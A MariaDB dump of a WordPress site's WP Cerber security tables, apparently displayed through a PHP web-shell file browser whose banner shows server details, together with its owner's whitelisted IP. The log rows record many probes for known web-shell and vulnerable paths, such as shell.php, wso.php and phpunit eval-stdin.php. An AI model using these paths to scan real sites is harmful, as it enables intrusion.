HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: cssnetorguk (1024)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //restore/20230201.dailyjollycouk.sql
-- MariaDB dump 10.19  Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: dailyjollycouk
-- ------------------------------------------------------
-- Server version	10.5.18-MariaDB-1:10.5.18+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `dailyjollycouk`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `dailyjollycouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;

USE `dailyjollycouk`;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
INSERT INTO `cerber_acl` VALUES ('185.175.113.72',3115282760,3115282760,'W','My IP address',0,0,'','');
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ac_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_status` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_by_user` bigint(20) unsigned NOT NULL DEFAULT 0,
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('185.244.175.134',3119820678,'',0,1672790616.1412,55,'lL6zj3FD9qZXuOnePgyvk5tW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/74034.php',0,19,0),('206.189.74.36',3468511780,'',0,1672815043.8554,55,'cBZ94p0UfmCjVn5SvO2KdkgN','','19|0|0|0|dailyjolly.co.uk/public/la.php',0,19,0),('125.65.229.149',2101470613,'',0,1673440021.8399,55,'98KWNcoZVJIwyLv62aF14rHB','','19|0|0|0|www.dailyjolly.co.uk/eweb/login_admin.asp',0,19,0),('185.36.81.21',3106165013,'',0,1673461186.9761,55,'216IZjvDWVsHJTdYlQzwhRqC','','19|0|0|0|dailyjolly.co.uk/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486564.8180,55,'Ft6qj7iP3aMWVcmsrZTLye0I','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486565.8991,55,'C1bcoyk9rOgn3PHafu6AvQUm','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/wp-admin.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486566.7235,55,'12Ul7ThfPtxBj38eYbcqDXmM','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486567.3991,55,'Nu0xbCUlRkX8QTL1vy7iSgVW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486567.9607,55,'e6dp0MrGctIji489B2lDxHSm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486568.0019,10,'e6dp0MrGctIji489B2lDxHSm','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,707,0),('159.89.88.144',2673432720,'',0,1673486568.5290,100,'hd90DFeL8CP5nYsOE1rxlXRi','','13|0|0|0|www.dailyjolly.co.uk/123.php',0,13,0),('159.89.88.144',2673432720,'',0,1673486569.1281,55,'XwGZnRT6VyLuPxWhA8q7tUIB','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/js/widgets/index.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486569.7281,55,'xqBJPjXL6b1UyC98o7YMTQ02','','19|0|0|0|www.dailyjolly.co.uk/nf_tracking.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486570.2885,55,'UwlDzS9VspfMQxnGEN5kOFqL','','19|0|0|0|www.dailyjolly.co.uk/nin.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486570.8990,55,'Lj0ShZCQvyqYDM46z9B3xlpd','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486573.6755,55,'2CyrOxl0D4Gh3kiBQEZUwejg','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486574.2671,55,'oYQ1weWUDR9g6zljurSdsBHx','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486574.7722,55,'dJ7cnC0igKIjlNup5mUEaFvf','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php',0,19,0),('159.89.88.144',2673432720,'',0,1673486575.2363,55,'TnrGgM0lYda54LFp6uvQCN1x','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('125.65.228.200',2101470408,'',0,1673494197.9648,55,'T0j6clDkds9pwI1QEXg4eFK8','','19|0|0|0|www.dailyjolly.co.uk/ewebeditor/login_admin.asp',0,19,0),('20.241.59.93',351353693,'',0,1673494949.0859,55,'PzE3vGklCb4tF9JVmiW7XuIU','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php',0,19,0),('20.241.59.93',351353693,'',0,1673494949.0877,55,'lVhgzxWka2PO7LZwvpqSornJ','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('20.241.59.93',351353693,'',0,1673494949.6515,55,'TZktaUYMhcmKs1NGq4OzRCQV','','19|0|0|0|dailyjolly.co.uk/fhevfsvq.php',0,19,0),('3.71.42.211',54995667,'',0,1673515388.3423,55,'SK9gukRNvyUpo1bOs0wJM853','','19|0|0|0|dailyjolly.co.uk/wp/xmlrpc.php',0,19,0),('3.71.42.211',54995667,'',0,1673515427.8268,55,'zbp6xUIW5EOrD0YJasPMeyCu','','19|0|0|0|dailyjolly.co.uk/wordpress/xmlrpc.php',0,19,0),('3.71.42.211',54995667,'',0,1673515464.2739,55,'rNRZXMzvFW4On7PDSiJ6ja5H','','19|0|0|0|dailyjolly.co.uk/old/xmlrpc.php',0,19,0),('3.71.42.211',54995667,'',0,1673515501.2984,55,'jvLUFM0G3yHOKCYEw7TPSX8z','','19|0|0|0|dailyjolly.co.uk/new/xmlrpc.php',0,19,0),('3.71.42.211',54995667,'',0,1673515531.8148,55,'jGuasp8We0y6OSU1PghVTBH5','','19|0|0|0|dailyjolly.co.uk/blog/xmlrpc.php',0,19,0),('3.71.42.211',54995667,'',0,1673515531.8768,10,'jGuasp8We0y6OSU1PghVTBH5','','707|0|0|0|dailyjolly.co.uk/blog/xmlrpc.php',0,707,0),('212.192.24.22',3569358870,'',0,1673557771.2949,55,'uAVzGdnWvqm8UH2tZxf0T9Mh','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557771.6923,55,'tSUKau89vmrgnCsHQ4T0ix3X','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/wp-admin.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557772.0892,55,'Dd8vZPtmqi0VfouyIgcJ4bhC','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557772.5304,55,'b83sAeMNjOp6QRK10ISvVqEo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557772.9685,55,'Z34Lsw9Pibn0KXk6xNMtlo8g','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557773.1444,55,'RmBq7OFUMhJfNZz5d1Yle9a0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557773.1786,10,'RmBq7OFUMhJfNZz5d1Yle9a0','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,707,0),('212.192.24.22',3569358870,'',0,1673557773.5334,100,'jmNz7DlVrUcB2e3wYGbRWTnO','','13|0|0|0|www.dailyjolly.co.uk/123.php',0,13,0),('161.97.158.118',2707529334,'',0,1673557773.5764,55,'DzflpGQ7NEUPsB0H9vFZcY3h','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/wp-admin.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557774.2367,55,'4hDGmwtoNMiuyjILUz0fbElZ','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/js/widgets/index.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557774.5926,55,'q7s31VgQ5PUytwno9EbC6kvN','','19|0|0|0|www.dailyjolly.co.uk/nf_tracking.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557775.0168,55,'omKazubUci2X6PRByMsd3Srp','','19|0|0|0|www.dailyjolly.co.uk/nin.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557775.2791,55,'e3XzKq2pVjZbfg1hRnG5CvBF','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557775.4047,55,'b6rTQgjRfoZ24U3GYsBxXiMN','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557777.0941,55,'OpVyJDdiCMBAP4qIEFcs82R9','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557777.4490,55,'TnlkwXQjrupLDC6aYfE874NM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557777.8644,55,'bTBVFMRnc0vpwxdlJWDQCIg1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php',0,19,0),('212.192.24.22',3569358870,'',0,1673557778.6623,55,'6g8mHU3vXBe2hW4EMNRYlTGb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557778.7824,55,'Hj2Zm4xQYArzM0sLw5KtESUy','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557779.5836,55,'NsrQBSJZbpidtKqFaV2xnvA7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557779.6128,10,'NsrQBSJZbpidtKqFaV2xnvA7','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes.php',0,707,0),('161.97.158.118',2707529334,'',0,1673557781.4752,100,'uRmGnPvJ9VoXLDdBzEjyx5CA','','13|0|0|0|www.dailyjolly.co.uk/123.php',0,13,0),('161.97.158.118',2707529334,'',0,1673557781.8914,55,'rfzuC7jQv1pBP3aNtEVyoLRG','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/js/widgets/index.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557783.2185,55,'kt0JvH9NgyfV3EiwblOMxp27','','19|0|0|0|www.dailyjolly.co.uk/nf_tracking.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557784.9132,55,'lFeKxZXr80HzgMWdYjL5atAy','','19|0|0|0|www.dailyjolly.co.uk/nin.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557786.3521,55,'wLJB3QMnPXZzDbq5pUitsy10','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557792.2766,55,'P2vhVoWEukbC4IrKitS3DlY7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557792.6306,55,'P8tEIBm0LDiv4k5xYnujFlar','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557794.0446,55,'WL87wb1kVpIrNBhcTz9mZygl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/twentythree/inc/index.php',0,19,0),('161.97.158.118',2707529334,'',0,1673557795.7546,55,'bWlEhGr67wtULsF8Qz1fPJvp','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('216.131.104.16',3632490512,'',0,1673559288.7000,55,'7aeD9X0LH4IwkrzWQM2hpRf5','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('20.241.59.93',351353693,'',0,1673579108.0684,55,'oLWhDP5lFZmvINqT1UKHzVwA','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('20.241.59.93',351353693,'',0,1673579108.0716,55,'SLw5skCAVgoyuba6JfKiT0me','','19|0|0|0|dailyjolly.co.uk/zopliamn.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612595.3574,55,'RQ3fi9WzO6khosqEPHNjFB0T','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612667.5989,55,'K2XzvAW673JSUwQy8sgG1Bhu','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612669.3528,55,'XdxvDcuiGkUMNOBT9nYrZe8E','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612674.4792,55,'ZH7qmSPsBGCtwnEOcI1zF9Lx','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612675.0612,55,'MpwZzgLYfW4O1uo9cJINneqG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612675.1387,10,'MpwZzgLYfW4O1uo9cJINneqG','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('216.131.104.15',3632490511,'',0,1673612678.0251,55,'OQArqRZ6CEYfvJcldWtT19z4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612679.4191,55,'kF2gIai0ULNcB4xlnzDpH7EX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612680.0091,55,'ATIaRub8PZhYesrQip3zW7d0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612681.2336,55,'vtmdQkHgpONlwRL9F8VYno31','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612682.8582,55,'ZF51YNP8Iriqg4O3nUWeR0Ql','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('216.131.104.15',3632490511,'',0,1673612794.8030,100,'9jDWVJQc8fzPXqKI5U07asil','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('216.131.104.15',3632490511,'',0,1673612846.2566,55,'ndOFiUckNbIHBh1s86xvKVGz','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('216.131.104.16',3632490512,'',0,1673612847.8553,55,'ZpSPg9jr36HRlGTo5hfOBtM7','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('185.36.81.21',3106165013,'',0,1673616498.8692,55,'5C8G4McJXE21biHDmP7odKWk','','19|0|0|0|dailyjolly.co.uk/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('13.56.237.36',221834532,'',0,1673623363.9512,55,'Fot42qbXG1hMycjxegY3K6il','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('13.56.237.36',221834532,'',0,1673633565.4207,55,'Y3pritG14zyaKlgbes6QUmT5','','19|0|0|0|dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('136.144.179.119',2291184503,'',0,1673641949.1559,55,'MGVN5ey6zklAtCvsPuTabQUX','','19|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,19,0),('109.248.175.147',1845014419,'',0,1673645517.6423,55,'2fUz1QVTF3E0oui9kNKeqs6r','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php',0,19,0),('109.248.175.147',1845014419,'',0,1673675565.3687,55,'HyzuekOdUAjZptEqlw9RS7n1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php',0,19,0),('168.100.162.235',2825167595,'',0,1673695103.1003,55,'m0d9sgLxlJIDft7Vh25CB84S','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('168.100.162.235',2825167595,'',0,1673695103.5911,55,'TD3976xHsUKObcE4wnMml8gz','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('168.100.162.235',2825167595,'',0,1673695103.9891,55,'8r5jwdzWviBlKbuy7asH3GPD','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('185.36.81.21',3106165013,'',0,1673697959.6050,55,'g35Wy8hIubsMJ6mD7cTQLSVZ','','19|0|0|0|dailyjolly.co.uk/js/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('51.222.112.213',870215893,'',0,1673703971.7039,55,'PfComZk4WGuK817XgLlaOFrM','','19|0|0|0|dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717834.5001,55,'tPkycol5C1TabSdivZ0pHjXJ','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717836.4825,55,'khupvHBN90aPGgdRJ42K8rMj','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717840.7410,55,'FLUlvj5YCSecGHBzMgqkdZo8','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717841.8925,55,'SKIoHAdP2UViug6QzwkBm10y','','19|0|0|0|www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717870.3925,55,'MuDzmhRQCneykpPtHWxE6JKV','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717870.4285,10,'MuDzmhRQCneykpPtHWxE6JKV','','707|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,707,0),('88.214.26.8',1490426376,'',0,1673717882.6536,55,'6OiVCuZmR2z5Ew4jI7F9xBPY','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717890.5362,55,'9Eh7XyWZOuYbcRL2TnVUNt1K','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717890.7526,55,'6gz9A8UlaTLyCJXhoiuspDZ0','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717897.1178,55,'iRkoz0jrJs9hB6m4aKTnECyd','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717927.2037,55,'SYgstjFBKhd4rVNZOI6AzHCD','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717927.4678,55,'iEKj93SA4MtsTFlY5qyJIo2V','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717929.1007,55,'2kItSYoCEQ9NneMaF63rdTgw','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717933.5712,55,'61ZnlF5wEODSsaWcHLuKBmYi','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717950.0041,100,'VSsPyGdT4Xrtfe8NAKJFolQ6','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('88.214.26.8',1490426376,'',0,1673717958.3892,55,'QfgYyRamDNSvM8rVGhc60jpd','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('88.214.26.8',1490426376,'',0,1673717966.2380,55,'P5KwarlDeZuynIogGfdBJpjC','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.8123,55,'X2ApDCYInaByPiZ6RKh84kfb','','19|0|0|0|dailyjolly.co.uk/wp-info.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.8153,55,'eIu4nzsfgNM71RX83QxPmC6B','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.8461,55,'bZEIdghHepo3vW61wXPzJjRs','','19|0|0|0|dailyjolly.co.uk/wsa.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.8497,55,'NcUevzP4Jnf8k62H1KpWdDj9','','19|0|0|0|dailyjolly.co.uk/bala.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.8737,55,'VlF93muMQLCnAzK5boTye8gW','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733496.9346,10,'NcUevzP4Jnf8k62H1KpWdDj9','','707|0|0|0|dailyjolly.co.uk/bala.p